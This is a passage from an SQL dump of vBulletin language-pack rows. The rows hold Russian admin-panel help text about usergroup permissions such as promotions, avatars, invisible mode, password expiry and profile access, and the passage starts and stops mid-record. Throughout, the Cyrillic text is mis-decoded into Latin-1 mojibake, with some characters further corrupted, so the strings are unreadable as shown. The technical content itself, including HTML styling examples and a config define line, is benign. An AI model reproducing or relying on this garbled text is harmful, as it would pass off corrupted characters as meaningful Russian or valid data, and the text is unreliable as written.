\r\nÄâèæîê ôîðóìà òàêæå ïîääåðæèâàåò ãðóïïîâûå ïîâûøåíèÿ, îñíîâûâàÿñü íà íåêîòîðûõ óñëîâèÿõ. Ãîâûøåíèÿ èñïîëüçóþòñÿ äëÿ àâòîìàòè÷åñêîé ñìåíû ÷ëåíñòâà â ãðóïïàõ ïðè äîñòèæåíèè îïðåäåë¸ííîãî óðîâíÿ ðåïóòàöèè, ñðîêà ðåãèñòðàöèè è/èëè êîëè÷åñòâà îïóáëèêîâàííûõ ñîîáùåíèé. Ãîâûøåíèÿ, èñïîëüçóåìûå ñîâìåñòíî ñ ðåïóòàöèåé ïîëüçîâàòåëÿ, ìîãóò áûòü îñîáåííî ýôôåêòèâíû (ñì. ðàçäåëû ïîìîùè ïî ðåïóòàöèè ïîëüçîâàòåëåé). Âû ìîæåòå óïðàâëÿòü ïîâûøåíèÿìè ñî ñòðàíèöû Ãîâûøåíèÿ.', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'), (24473, -1, 'usergroup_title', 'cphelptext', 'ÃŽ ãðóïïàõ ïîëüçîâàòåëåé', 'vbulletin', '', 0, ''), (24474, -1, 'usergroup_add_text', 'cphelptext', 'Ãà ýòîé ñòðàíèöå âû ìîæåòå ñîçäàòü íîâóþ ãðóïïó ïîëüçîâàòåëåé ñ ïðàâàìè äîñòóïà, óêàçàííûì íèæå. Ñìîòðèòå ñïðàâêó î ïðåäîñòàâëåíèè ïðàâ äîñòóïà äëÿ ïîëó÷åíèÿ äîïîëíèòåëüíîé èíôîðìàöèè.', 'vbulletin', '', 0, ''), (24475, -1, 'usergroup_add_title', 'cphelptext', 'Äîáàâèòü íîâóþ ãðóïïó', 'vbulletin', '', 0, ''), (24476, -1, 'usergroup_add_ugid_base_text', 'cphelptext', 'Ñ ïîìîùüþ ýòîãî ïàðàìåòðà âû ìîæåòå áûñòðî óêàçàòü íîâîé ãðóïïå ïðàâà â ðàçäåëàõ, îñíîâûâàÿñü íà îäíîé èç ñóùåñòâóþùèõ. Ãòî î÷åíü óäîáíî, êîãäà íîâàÿ ãðóïïà ïîëüçîâàòåëåé íå äîëæíà èìåòü ïðàâ êî âñåì ðàçäåëàì.', 'vbulletin', 'zCarot', 1214998438, '3.8.0 Alpha 1'), (24477, -1, 'usergroup_add_ugid_base_title', 'cphelptext', 'Ñîçäàòü ïðàâà, îñíîâûâàÿñü íà ñóùåñòâóþùèõ äëÿ ãðóïïû ïîëüçîâàòåëåé', 'vbulletin', 'zCarot', 1200353630, '3.7.0 Beta 4'), (24478, -1, 'usergroup_add_edit_cananimateavatar_text', 'cphelptext', 'Îïðåäåëÿåò, ìîãóò ëè ïîëüçîâàòåëè ýòîé ãðóïïû çàãðóæàòü àíèìèðîâàííûå GIF àâàòàðû.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'), (24479, -1, 'usergroup_add_edit_cananimateavatar_title', 'cphelptext', 'Ìîæåò çàãðóæàòü àíèìèðîâàííûé àâàòàð', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'), (24480, -1, 'usergroup_add_edit_cananimateprofilepic_text', 'cphelptext', 'Îïðåäåëÿåò, ìîãóò ëè ïîëüçîâàòåëè ýòîé ãðóïïû çàãðóæàòü àíèìèðîâàííûå GIF ôîòîãðàôèè.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'), (24481, -1, 'usergroup_add_edit_cananimateprofilepic_title', 'cphelptext', 'Ìîæåò çàãðóæàòü àíèìèðîâàííóþ ôîòîãðàôèþ', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'), (24482, -1, 'usergroup_edit_canemailmember_text', 'cphelptext', 'Îïðåäåëÿåò, ìîãóò ëè ïîëüçîâàòåëè ýòîé ãðóïïû îòïðàâëÿòü ýëåêòðîííûå ïèñüìà äðóãèì ïîëüçîâàòåëÿì ÷åðåç ôîðóì. Ãà âàøåì ôîðóìå äîëæíà áûòü âêëþ÷åíà ôóíêöèÿ îòïðàâêè ýëåêòðîííûõ ïèñåì. À òàêæå ó÷òèòå, ÷òî ïîëüçîâàòåëü ìîæåò âûêëþ÷èòü ïðè¸ì ýëåêòðîííûõ ïèñåì ñîîáùåíèé îò äðóãèõ ïîëüçîâàòåëåé.', 'vbulletin', 'zCarot', 1145033153, '3.6.0 Beta 1'), (24483, -1, 'usergroup_edit_canemailmember_title', 'cphelptext', 'Ìîæåò îòïðàâëÿòü ýëåêòðîííûå ïèñüìà ïîëüçîâàòåëÿì', 'vbulletin', 'zCarot', 1145033153, '3.6.0 Beta 1'), (24484, -1, 'usergroup_edit_cangivearbinfraction_text', 'cphelptext', 'Îïðåäåëÿåò, ìîãóò ëè ïîëüçîâàòåëè ýòîé ãðóïïû óñòàíàâëèâàòü ñîáñòâåííûå îïèñàíèÿ íàðóøåíèÿ, áàëëû íàðóøåíèé è äàòó èñòå÷åíèÿ. Ãîëüçîâàòåëü äîëæåí òàêæå èìåòü ïðàâà \"äåëàòü çàïèñè î íàðóøåíèÿõ\".', 'vbulletin', 'zCarot', 1149889255, '3.6.0 Beta 2'), (24485, -1, 'usergroup_edit_cangivearbinfraction_title', 'cphelptext', 'Ìîæåò óñòàíàâëèâàòü ïðîèçâîëüíîå çíà÷åíèå íàðóøåíèé', 'vbulletin', 'zCarot', 1149889255, '3.6.0 Beta 2'), (24486, -1, 'usergroup_add_edit_cansearchft_bool_text', 'cphelptext', 'Îïðåäåëÿåò, ìîãóò ëè ïîëüçîâàòåëè ýòîé ãðóïïû èñïîëüçîâàòü ëîãè÷åñêèé ïîèñê íà âàøåì ôîðóìå. Ãòà îïöèÿ áóäåò ðàáîòàòü, òîëüêî åñëè âû âûáðàëè â êà÷åñòâå òèïà ïîèñêà Fulltext. Ëîãè÷åñêèé ïîèñê ïîçâîëÿåò èñïîëüçîâàòü êëþ÷åâûå ñëîâà AND (è), OR (èëè) è/èëè NOT (íå) äëÿ áîëåå êîððåêòíîãî ïîèñêà. Ãà áîëüøèõ ôîðóìàõ ýòî ìîæåò äàâàòü áîëüøóþ íàãðóçêó íà ñåðâåð, ïîýòîìó âàì ñëåäóåò ó÷èòûâàòü ýòî. Åñëè âû âûêëþ÷èòå ýòó îïöèþ, òî ïîèñê Fulltext áóäåò äàâàòü ìåíüøå íàãðóçêè, ÷åì îáû÷íûé.

Äëÿ ðàáîòû ýòîé îïöèè âû äîëæíû âêëþ÷èòü ïîèñêîâóþ ñèñòåìó ôîðóìà â âàøèõ îñíîâíûõ íàñòðîéêàõ è äàííàÿ ãðóïïà ïîëüçîâàòåëåé äîëæíà èìåòü ïðàâà ïîèñêà ïî ôîðóìó.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'), (24487, -1, 'usergroup_add_edit_cansearchft_bool_title', 'cphelptext', 'Ìîæåò èñïîëüçîâàòü ëîãè÷åñêèé ïîèñê', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'), (24488, -1, 'usergroup_add_edit_canusefriends_text', 'cphelptext', 'Åñëè \"Äà\", òî ïîëüçîâàòåëü ñìîæåò èñïîëüçîâàòü ôóíêöèþ \"Äðóçüÿ\" íà ôîðóìå (åñëè ýòà ôóíêöèÿ âêëþ÷åíà ãëîáàëüíî)', 'vbulletin', 'zCarot', 1199282335, '3.7.0 Beta 4'), (24489, -1, 'usergroup_add_edit_canusefriends_title', 'cphelptext', 'Ìîæåò èñïîëüçîâàòü ñïèñîê äðóçåé', 'vbulletin', 'zCarot', 1199282335, '3.7.0 Beta 4'), (24490, -1, 'usergroup_add_edit_canviewthreads_text', 'cphelptext', 'Åñëè ýòà îïöèÿ âûêëþ÷åíà, òî ïîëüçîâàòåëè ýòîé ãðóïïû íå ñìîãóò ïðîñìàòðèâàòü ñîäåðæèìîå òåì. Ãòî ìîæåò èñïîëüçîâàòüñÿ äëÿ òîãî, ÷òîáû ëþäè âèäåëè, ÷òî îíè ñìîãóò ïîëó÷èòü, èìåÿ áîëåå ïîëíûå ïðàâà.', 'vbulletin', 'zCarot', 1197643100, '3.7.0 Beta 2'), (24491, -1, 'usergroup_add_edit_canviewthreads_title', 'cphelptext', 'Ìîæåò ñìîòðåòü ñîäåðæèìîå òåì', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'), (24492, -1, 'usergroup_add_edit_isnotmoderated_text', 'cphelptext', 'Ãðîâåðêà ñîáûòèé êàëåíäàðÿ ìîæåò áûòü âêëþ÷åíà ïðè ðåäàêòèðîâàíèè íàñòðîåê êàëåíäàðÿ. Äàííàÿ îïöèÿ îïðåäåëÿåò, ñëåäóåò ëè ñäåëàòü èñêëþ÷åíèå äëÿ ýòîé ãðóïïû ïîëüçîâàòåëåé.', 'vbulletin', 'zCarot', 1155823343, '3.6.1'), (24493, -1, 'usergroup_add_edit_isnotmoderated_title', 'cphelptext', 'Ñîáûòèÿ íå ïðîâåðÿþòñÿ', 'vbulletin', 'zCarot', 1155823343, '3.6.1'), (24494, -1, 'usergroup_add_edit_title_text', 'cphelptext', 'Ãòî íàçâàíèå ãðóïïû ïîëüçîâàòåëåé. Îíî èñïîëüçóåòñÿ äëÿ èäåíòèôèêàöèè ýòîé ãðóïïû íà ôîðóìå è â óïðàâëåíèè ãðóïïàìè ïîëüçîâàòåëåé.', 'vbulletin', '', 0, ''), (24495, -1, 'usergroup_add_edit_title_title', 'cphelptext', 'Çàãîëîâîê', 'vbulletin', '', 0, ''), (24496, -1, 'usergroup_add_edit_description_text', 'cphelptext', 'Ââåäèòå îïèñàíèå äëÿ ýòîé ãðóïïû ïîëüçîâàòåëåé. Ãàïðèìåð, åñëè ýòà ãðóïïà èñïîëüçóåòñÿ äëÿ ïîëó÷åíèÿ äîïîëíèòåëüíûõ ïîëíîìî÷èé, çäåñü âû ìîæåòå îïèñàòü èõ.', 'vbulletin', '', 0, ''), (24497, -1, 'usergroup_add_edit_description_title', 'cphelptext', 'Îïèñàíèå', 'vbulletin', '', 0, ''), (24498, -1, 'usergroup_add_edit_usertitle_text', 'cphelptext', 'Åñëè âû õîòèòå, ÷òîáû ïîëüçîâàòåëè (÷ëåíû ýòîé ãðóïïû) èìåëè îñîáûé ñòàòóñ, âû ìîæåòå óêàçàòü ýòîò ñòàòóñ çäåñü. Îí áóäåò îòîáðàæàòüñÿ â ïðîôèëå ïîëüçîâàòåëÿ, åãî ñîîáùåíèÿõ è ò.ä.', 'vbulletin', '', 0, ''), (24499, -1, 'usergroup_add_edit_usertitle_title', 'cphelptext', 'ÃŽ ïîëüçîâàòåëÿõ', 'vbulletin', '', 0, ''), (24500, -1, 'usergroup_add_edit_htmltags_text', 'cphelptext', 'Ãåðâîå ïîëå äëÿ îòêðûâàþùåãî òåãà, âòîðîå - äëÿ çàêðûâàþùåãî. Ãòè òåãè áóäóò âñòàâëåíû ïåðåä è ïîñëå èìåíè ïîëüçîâàòåëÿ, ïðèìåðíî òàê:
\r\n
[îòêðûâàþùèé òåã]èìÿ_ïîëüçîâàòåëÿ[çàêðûâàþùèé òåã]
\r\n
Ãåêîòîðûå HTML òåãè, êîòîðûå âû, âîçìîæíî, çàõîòèòå èñïîëüçîâàòü, ïðèâåäåíû òóò:

\r\n<span style=\"font-weight: bold;\">èìÿ_ïîëüçîâàòåëÿ</span> = èìÿ_ïîëüçîâàòåëÿ
\r\n<span style=\"font-style: italic;\">èìÿ_ïîëüçîâàòåëÿ</span> = èìÿ_ïîëüçîâàòåëÿ
\r\n<span style=\"text-decoration: underline;\">èìÿ_ïîëüçîâàòåëÿ</span> = èìÿ_ïîëüçîâàòåëÿ
\r\n<span style=\"color: red;\">èìÿ_ïîëüçîâàòåëÿ</span> = username
\r\n<span style=\"font: 20px verdana;\">èìÿ_ïîëüçîâàòåëÿ</span> = èìÿ_ïîëüçîâàòåëÿ

\r\n\r\nÂû òàêæå ìîæåòå ñîñòàâëÿòü êîìáèíàöèè, èñïîëüçóÿ íåñêîëüêî àòðèáóòîâ ñòèëÿ:

\r\n\r\n<span style=\"font: 20px verdana; color: red;\">èìÿ_ïîëüçîâàòåëÿ</span> = èìÿ_ïîëüçîâàòåëÿ', 'vbulletin', 'zCarot', 1169465876, '3.6.5'), (24501, -1, 'usergroup_add_edit_htmltags_title', 'cphelptext', 'HTML ðàçìåòêà èìåíè ïîëüçîâàòåëÿ', 'vbulletin', '', 0, ''), (24502, -1, 'usergroup_add_edit_passwordexpires_text', 'cphelptext', 'Ââåäèòå êîëè÷åñòâî äíåé, ïî èñòå÷åíèè êîòîðûõ ïîëüçîâàòåëè ýòîé ãðóïïû áóäóò îáÿçàíû ñìåíèòü ñâîé ïàðîëü. Ââåäèòå 0, ÷òîáû íå òðåáîâàòü ñìåíû ïàðîëÿ.', 'vbulletin', '', 0, ''), (24503, -1, 'usergroup_add_edit_passwordexpires_title', 'cphelptext', 'Ñðîê óñòàðåâàíèÿ ïàðîëÿ', 'vbulletin', '', 0, ''), (24504, -1, 'usergroup_add_edit_passwordhistory_text', 'cphelptext', 'Ãàïðèìåð, åñëè çäåñü óñòàíîâëåíî 30 äíåé è ïîëüçîâàòåëü ïûòàåòñÿ ñìåíèòü ïàðîëü, îí íå ñìîæåò èñïîëüçîâàòü íèêàêèå ïàðîëè, êîòîðûå èñïîëüçîâàë â òå÷åíèè ïîñëåäíèõ 30 äíåé. Ãòà îïöèÿ ìîæåò áûòü èñïîëüçîâàíà ñîâìåñòíî ñ ïðåäûäóùåé îïöèåé äëÿ ïîâûøåíèÿ áåçîïàñíîñòè.', 'vbulletin', '', 0, ''), (24505, -1, 'usergroup_add_edit_passwordhistory_title', 'cphelptext', 'Õðàíèòü èñòîðèþ ïàðîëåé', 'vbulletin', '', 0, ''), (24506, -1, 'usergroup_add_edit_showgroup_text', 'cphelptext', 'Åñëè âû íå õîòèòå, ÷òîáû ïîëüçîâàòåëè çíàëè, êòî ïðèíàäëåæèò ýòîé ãðóïïå, âûêëþ÷èòå ýòó îïöèþ.', 'vbulletin', '', 0, ''), (24507, -1, 'usergroup_add_edit_showgroup_title', 'cphelptext', 'Îòîáðàæåíèå ÷ëåíîâ ïðè ïðîñìîòðå ãðóïïû', 'vbulletin', '', 0, ''), (24508, -1, 'usergroup_add_edit_showbirthday_text', 'cphelptext', '×òîáû äíè ðîæäåíèÿ îòîáðàæàëèñü â êàëåíäàðå, îïöèÿ \"Ãîêàçûâàòü äíè ðîæäåíèÿ\" äîëæíà áûòü âêëþ÷åíà äëÿ ýòîãî êàëåíäàðÿ. Ñì. Óïðàâëåíèå êàëåíäàðÿìè.
\r\n
×òîáû äíè ðîæäåíèÿ îòîáðàæàëèñü íà ãëàâíîé ñòðàíèöå ôîðóìà, íåîáõîäèìî âêëþ÷èòü îïöèþ \"Îòîáðàæàòü ñåãîäíÿøíèå äíè ðîæäåíèÿ\" â îñíîâíûõ íàñòðîéêàõ.', 'vbulletin', 'zCarot', 1205430879, '3.7.0 Release Candidate 1'), (24509, -1, 'usergroup_add_edit_showbirthday_title', 'cphelptext', 'Äíè ðîæäåíèÿ âèäèìû', 'vbulletin', '', 0, ''), (24510, -1, 'usergroup_add_edit_showmemberlist_text', 'cphelptext', 'Ãòà îïöèÿ êàñàåòñÿ ñïèñêà ïîëüçîâàòåëåé.  í¸ì îòîáðàæàþòñÿ âñå ïîëüçîâàòåëè ôîðóìà. Åñëè âû âûêëþ÷èòå ýòó îïöèþ, ÷ëåíû ýòîé ãðóïïû íå áóäóò îòîáðàæàòüñÿ â ñïèñêå ïîëüçîâàòåëåé.
\r\n
\r\nÃîìíèòå: Ãî óìîë÷àíèþ, â ñâÿçè ñ ïîâûøåííîé íàãðóçêîé, äîïîëíèòåëüíûå ãðóïïû íå ìîãóò çàìåíÿòü çíà÷åíèÿ îñíîâíîé. Åñëè âàì íóæíà ýòà ôóíêöèÿ, òî äîáàâüòå ñëåäóþùóþ ñòðîêó â âàø ôàéë includes/config.php:\r\n
define(\'MEMBERLIST_INCLUDE_SECONDARY\', true);
', 'vbulletin', 'zCarot', 1174307144, '3.6.6'), (24511, -1, 'usergroup_add_edit_showmemberlist_title', 'cphelptext', 'Îòîáðàæåíèå ÷ëåíîâ â ñïèñêå ïîëüçîâàòåëåé', 'vbulletin', '', 0, ''), (24512, -1, 'usergroup_add_edit_allowmembergroups_text', 'cphelptext', 'Åñëè äîïîëíèòåëüíàÿ ãðóïïà êàê-ëèáî ðàñøèðÿåò ïðàâà îñíîâíîé ãðóïïû, ýòà îïöèÿ äîëæíà áûòü óñòàíîâëåíà â \"Äà\".

\r\nÃðàâà äîïîëíèòåëüíîé ãðóïïû íå áóäóò îêàçûâàòü íèêàêîãî âëèÿíèÿ, åñëè ýòà îïöèÿ óñòàíîâëåíà â \"Ãåò\". Ãðè÷èíîé óñòàíîâêè ýòîé îïöèè â \"Ãåò\" ìîæåò ñëóæèòü òî, ÷òî ýòî ãðóïïà ïîëüçîâàòåëåé - çàáëîêèðîâàííûå, ò.Ã¥. ó÷àñòíèêè íå äîëæíû ïîëó÷àòü äîñòóï, íåñìîòðÿ íà íàõîæäåíèå â äîïîëíèòåëüíîé ãðóïïå ïîëüçîâàòåëåé, êîòîðàÿ äàåò èì äîñòóï ê ÷åìó-ëèáî.', 'vbulletin', '', 0, ''), (24513, -1, 'usergroup_add_edit_allowmembergroups_title', 'cphelptext', 'Ãàçðåøèòü ðàñøèðåíèå ïðàâ äîñòóïà', 'vbulletin', '', 0, ''), (24514, -1, 'usergroup_add_edit_isnotbannedgroup_text', 'cphelptext', 'Åñëè âû ñäåëàåòå ýòó ãðóïïó \"çàáëîêèðîâàííîé\", âàì ñëåäóåò óñòàíîâèòü áîëüøèíñòâî ïðàâ äîñòóïà íèæå â çíà÷åíèå \"Ãåò\", â çàâèñèìîñòè îòòîãî, ÷òî âû õîòèòå ïîçâîëèòü/íå ïîçâîëèòü äåëàòü çàáëîêèðîâàííûì ïîëüçîâàòåëÿì.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'), (24515, -1, 'usergroup_add_edit_isnotbannedgroup_title', 'cphelptext', 'Ãòà ãðóïïà íå ÿâëÿåòñÿ ãðóïïîé \"Çàáëîêèðîâàííûå\"', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'), (24516, -1, 'usergroup_add_edit_ispublicgroup_text', 'cphelptext', 'Åñëè ýòà îïöèÿ âêëþ÷åíà, ïîëüçîâàòåëè ìîãóò ïîñëàòü çàÿâêó íà âñòóïëåíèå â ýòó ãðóïïó èç ñâîåãî êàáèíåòà. Òàêèå çàÿâêè ïîñòóïàþò â î÷åðåäü â óïðàâëåíèå ãðóïïàìè ïîëüçîâàòåëåé.', 'vbulletin', '', 0, ''), (24517, -1, 'usergroup_add_edit_ispublicgroup_title', 'cphelptext', 'Ãóáëè÷íàÿ ãðóïïà', 'vbulletin', '', 0, ''), (24518, -1, 'usergroup_add_edit_canoverride_text', 'cphelptext', 'Ãðè âêëþ÷åíèè ýòîé îïöèè è èñïîëüçîâàíèè ýòîé ãðóïïû, êàê äîïîëíèòåëüíîé, áóäåò èñïîëüçîâàòüñÿ ñòàòóñ ýòîé ãðóïïû âìåñòî ñòàòóñà îñíîâíîé.', 'vbulletin', '', 0, ''), (24519, -1, 'usergroup_add_edit_canoverride_title', 'cphelptext', 'Ãàçðåøåííàÿ çàìåíà ñòàòóñà îñíîâíîé ãðóïïû', 'vbulletin', '', 0, ''), (24520, -1, 'usergroup_add_edit_canseehidden_text', 'cphelptext', 'Åñëè ïîçâîëÿþò ïðàâà, òî ïîëüçîâàòåëè ìîãóò óñòàíîâèòü ñåáå ðåæèì \"íåâèäèìûé\" è íå îòîáðàæàòüñÿ â ñïèñêå ïîëüçîâàòåëåé, íàõîäÿùèõñÿ â äàííûé ìîìåíò íà ôîðóìå. Ãòà îïöèÿ óñòàíàâëèâàåòñÿ â êàáèíåòå ïîëüçîâàòåëÿ.

\r\nÂêëþ÷àÿ ýòó îïöèþ, âû ðàçðåøèòå ïîëüçîâàòåëÿì ýòîé ãðóïïû âèäåòü \"íåâèäèìûõ\" ïîëüçîâàòåëåé â ñïèñêå ïîëüçîâàòåëåé, íàõîäÿùèõñÿ â äàííûé ìîìåíò íà ôîðóìå. \"Ãåâèäèìûå\" ïîëüçîâàòåëè îòìå÷àþòñÿ çâåçäî÷êîé (*) â ñïèñêå ïîëüçîâàòåëåé, íàõîäÿùèõñÿ â äàííûé ìîìåíò íà ôîðóìå.', 'vbulletin', '', 0, ''), (24521, -1, 'usergroup_add_edit_canseehidden_title', 'cphelptext', 'Ìîæåò âèäåòü \"íåâèäèìûõ\" ïîëüçîâàòåëåé', 'vbulletin', '', 0, ''), (24522, -1, 'usergroup_add_edit_canviewmembers_text', 'cphelptext', 'Ãòà îïöèÿ îòíîñèòñÿ ê ïðîôèëÿì ïîëüçîâàòåëåé. Åñëè ýòà îïöèÿ âûêëþ÷åíà, ïîëüçîâàòåëè ýòîé ãðóïïû íå ñìîãóò ïðîñìàòðèâàòü ïðîôèëè ïîëüçîâàòåëåé.', 'vbulletin', '', 0, ''), (24523, -1, 'usergroup_add_edit_canviewmembers_title', 'cphelptext', 'Ìîæåò ñìîòðåòü èíôîðìàöèþ ïîëüçîâàòåëÿ', 'vbulletin', '', 0, ''), (24524, -1, 'usergroup_add_edit_canmodifyprofile_text', 'cphelptext', 'Åñëè óêàçàòü \"Ãåò\", òî ïîëüçîâàòåëè ýòîé ãðóïïû íå ñìîãóò èçìåíèòü:\r\n
    \r\n
  • ïðîôèëü
  • \r\n
  • íàñòðîéêè
  • \r\n
  • ïîäïèñü
  • \r\n
  • àâàòàð
  • \r\n
  • ôîòîãðàôèþ
  • \r\n
  • êîíôèäåíöèàëüíîñòü
  • \r\n
  • îòîáðàæåíèå ïðîôèëÿ
  • \r\n
  • ó÷àñòèå â ïóáëè÷íûõ ãðóïïàõ
  • \r\n
', 'vbulletin', 'zCarot', 1231766203, '3.8.1'), (24525, -1, 'usergroup_add_edit_canmodifyprofile_title', 'cphelptext', 'Ìîæåò ðåäàêòèðîâàòü ñâîé ïðîôèëü', 'vbulletin', '', 0, ''), (24526, -1, 'usergroup_add_edit_caninvisible_text', 'cphelptext', 'Åñëè ýòà îïöèÿ âêëþ÷åíà, ïîëüçîâàòåëè ýòîé ãðóïïû ñìîãóò óñòàíîâèòü ñåáå ðåæèì \"íåâèäèìûé\" íà ñòðàíèöå Îïöèè â ñâî¸ì êàáèíåòå. \"Ãåâèäèìûå\" ïîëüçîâàòåëè îòìå÷àþòñÿ çâ¸çäî÷êîé (*) â ñïèñêå ïîëüçîâàòåëåé, íàõîäÿùèõñÿ ñåé÷àñ íà ôîðóìå (ðàçóìååòñÿ, òîëüêî ó òåõ ïîëüçîâàòåëåé, êîòîðûå ìîãóò èõ âèäåòü).', 'vbulletin', '', 0, ''), (24527, -1, 'usergroup_add_edit_caninvisible_title', 'cphelptext', 'Ìîæåò óñòàíîâèòü ñåáå ðåæèì \"íåâèäèìûé\"', 'vbulletin', '', 0, ''), (24528, -1, 'usergroup_add_edit_showeditedby_text', 'cphelptext', 'Âêëþ÷åíèå ýòîé îïöèè îòîáðàçèò \"Ãåäàêòèðîâàëîñü òàêèì-òî âî ñòîëüêî-òî\" â ñîîáùåíèÿõ, êîòîðûå ðåäàêòèðîâàëèñü ÷ëåíàìè ýòîé ãðóïïû. Ãòà îïöèÿ ðàáîòàåò ñîâìåñòíî ñ îïöèåé \"Ãðåäåë âðåìåíè äî îòîáðàæåíèÿ \'Ãåäàêòèðîâàëîñü...\'\" â îñíîâíûõ íàñòðîéêàõ.', 'vbulletin', 'zCarot', 1205430879, '3.7.0 Release Candidate 1'), (24529, -1, 'usergroup_add_edit_showeditedby_title', 'cphelptext', 'Ãîêàçûâàòü ïðèìå÷àíèå \"Ãåäàêòèðîâàëîñü...\" â îòðåäàêòèðîâàííûõ ñîîáùåíèÿõ', 'vbulletin', '', 0, ''), (24530, -1, 'usergroup_add_edit_canseeraters_text', 'cphelptext', 'Ãàçðåøàåò ïîëüçîâàòåëÿì âèäåòü, êòî îñòàâëÿë êîììåíòàðèè, îòîáðàæàåìûå â êàáèíåòå ïîëüçîâàòåëÿ, ïðè äîáàâëåíèè èì ðåïóòàöèè. Ãòî òðåáóåò âêëþ÷åííîé ðåïóòàöèè.', 'vbulletin', '', 0, ''), (24531, -1, 'usergroup_add_edit_canseeraters_title', 'cphelptext', 'Ìîæåò âèäåòü, êòî åãî îöåíèâàë', 'vbulletin', '', 0, ''), (24532, -1, 'usergroup_add_edit_canjoingroups_text', 'cphelptext', 'Åñëè \"Äà\", òî ïîëüçîâàòåëü ñìîæåò âñòóïàòü â ñîöèàëüíûå ãðóïïû (åù¸ òðåáóåòñÿ ïðàâî \"Ìîæåò ïðîñìàòðèâàòü ñîöèàëüíûå ãðóïïû\").', 'vbulletin', 'zCarot', 1195740034, '3.7.0 Beta 1'), (24533, -1, 'usergroup_add_edit_canjoingroups_title', 'cphelptext', 'Ìîæåò âñòóïàòü â ñîöèàëüíûå ãðóïïû', 'vbulletin', 'zCarot', 1195740034, '3.7.0 Beta 1'), (24534, -1, 'usergroup_add_edit_canusecustomtitle_text', 'cphelptext', 'Åñëè ýòà îïöèÿ âêëþ÷åíà, ïîëüçîâàòåëè ýòîé ãðóïïû ñìîãóò ïðèñâîèòü ñåáå ïðîèçâîëüíûé ñòàòóñ íà ñòðàíèöå Ãåäàêòèðîâàòü ïðîôèëü â êàáèíåòå ïîëüçîâàòåëÿ. Ñòàòóñ îòîáðàæàåòñÿ â ñîîáùåíèÿõ ïîëüçîâàòåëÿ è â ïðîôèëå âìåñòî ëþáîãî ñòàòóñà, óêàçàííîãî äëÿ åãî ãðóïïû èëè îïðåäåëÿþùåãîñÿ ïî êîëè÷åñòâó ñîîáùåíèé (ñì. Óïðàâëåíèå ñòàòóñàìè).', 'vbulletin', '', 0, ''), (24535, -1, 'usergroup_add_edit_canusecustomtitle_title', 'cphelptext', 'Ìîæåò èñïîëüçîâàòü ñâîé ñòàòóñ', 'vbulletin', '', 0, ''), (24536, -1, 'usergroup_add_edit_canusesignature_text', 'cphelptext', 'Ãîäïèñü îòîáðàæàåòñÿ â êîíöå êàæäîãî ñîîáùåíèÿ ïîëüçîâàòåëÿ. Åñëè ýòà îïöèÿ âêëþ÷åíà, òî ïîëüçîâàòåëè äàííîé ãðóïïû ñìîãóò óñòàíàâëèâàòü ñâîþ ïîäïèñü ñ ïîìîùüþ ñòðàíèöû Ãåäàêòèðîâàòü ïîäïèñü â ñâî¸ì êàáèíåòå.', 'vbulletin', 'zCarot', 1152729976, '3.6.0 Release Candidate 2'), (24537, -1, 'usergroup_add_edit_canusesignature_title', 'cphelptext', 'Ìîæåò èñïîëüçîâàòü ïîäïèñü', 'vbulletin', '', 0, ''), (24538, -1, 'usergroup_add_edit_canseeprofilepic_text', 'cphelptext', 'Ôîòîãðàôèÿ ïîëüçîâàòåëÿ îòîáðàæàåòñÿ íà ñòðàíèöå åãî ïðîôèëÿ. Ôîòîãðàôèè íóæíû, ñîáñòâåííî, äëÿ òîãî, ÷òîáû çíàòü, êàê âûãëÿäèò ïîëüçîâàòåëü íà ñàìîì äåëå. Ãòà îïöèÿ îïðåäåëÿåò, ìîãóò èëè íåò ïîëüçîâàòåëè ýòîé ãðóïïû ñìîòðåòü ôîòîãðàôèè äðóãèõ.', 'vbulletin', '', 0, ''), (24539, -1, 'usergroup_add_edit_canseeprofilepic_title', 'cphelptext', 'Ìîæåò ñìîòðåòü ôîòîãðàôèè äðóãèõ ïîëüçîâàòåëåé', 'vbulletin', '', 0, ''), (24540, -1, 'usergroup_add_edit_canseehiddencustomfields_text', 'cphelptext', 'Ãàçðåøèòü ïîëüçîâàòåëÿì ïðîñìàòðèâàòü èíôîðìàöèþ â äîïîëíèòåëüíûõ ïîëÿõ ïðîôèëÿ, êîòîðûå îòìå÷åíû êàê ëè÷íûå.', 'vbulletin', '', 0, ''), (24541, -1, 'usergroup_add_edit_canseehiddencustomfields_title', 'cphelptext', 'Ìîæåò âèäåòü ëè÷íûå ïîëÿ ïðîôèëÿ', 'vbulletin', '', 0, ''), (24542, -1, 'usergroup_add_edit_canview_text', 'cphelptext', 'Ãòî ðàçðåøåíèå îïðåäåëÿåò, ìîæåò èëè íåò ïîëüçîâàòåëü èç ýòîé ãðóïïû ïðîñìàòðèâàòü ñòðàíèöû ôîðóìà. Åñëè âû ïîñòàâèòå çíà÷åíèå \"Ãåò\", òî ïîëüçîâàòåëè ýòîé ãðóïïû áóäóò âèäåòü ñòðàíèöó \"Ãåò äîñòóïà\" ïðè ïîïûòêàõ ïðîñìîòðà âñåõ ñòðàíèö âàøåãî ôîðóìà. Îáû÷íî ýòà îïöèÿ èñïîëüçóåòñÿ äëÿ îãðàíè÷åíèÿ äîñòóïà áëîêèðîâàííûõ ïîëüçîâàòåëåé.', 'vbulletin', '', 0, ''), (24543, -1, 'usergroup_add_edit_canview_title', 'cphelptext', 'Ìîæåò ïðîñìàòðèâàòü ðàçäåë', 'vbulletin', '', 0, ''), (24544, -1, 'usergroup_add_edit_canviewothers_text', 'cphelptext', 'Åñëè ýòà îïöèÿ âûêëþ÷åíà, òî ïîëüçîâàòåëè ýòîé ãðóïïû ñìîãóò âèäåòü òîëüêî ñâîè òåìû â ñïèñêå òåì ðàçäåëà. Òåìû, êîòîðûå ñîçäàíû íå èìè, íå áóäóò îòîáðàæàòüñÿ.', 'vbulletin', '', 0, ''), (24545, -1, 'usergroup_add_edit_canviewothers_title', 'cphelptext', 'Ìîæåò ïðîñìàòðèâàòü ÷óæèå òåìû', 'vbulletin', '', 0, ''), (24546, -1, 'usergroup_add_edit_canseedelnotice_text', 'cphelptext', 